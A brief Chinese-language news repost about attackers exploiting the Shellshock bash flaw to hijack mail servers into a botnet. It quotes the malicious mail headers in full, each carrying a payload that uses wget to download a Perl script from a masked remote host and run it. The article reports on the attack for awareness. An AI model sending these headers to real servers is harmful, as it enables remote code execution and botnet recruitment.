Skip to content Skip to main navigation Skip to footer
OSETC TECH

#1 Free Tutorial on The Net

Linux:来了!攻击者利用Shellshock漏洞入侵邮件服务器

June 15, 2015 by

Category: Linux 0 Comments

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。

Linux:来了!攻击者利用Shellshock漏洞入侵邮件服务器
Linux:来了!攻击者利用Shellshock漏洞入侵邮件服务器

安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:

Shellshock spam October 2014 (IP地址已隐藏)
===
To:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Cc:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Subject:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Message-ID:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Comments:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Keywords:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
Resent-Sender:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

 

来源:http://www.solidot.org/story?sid=41644

0 Comments

There are no comments yet

Leave a comment

Your email address will not be published.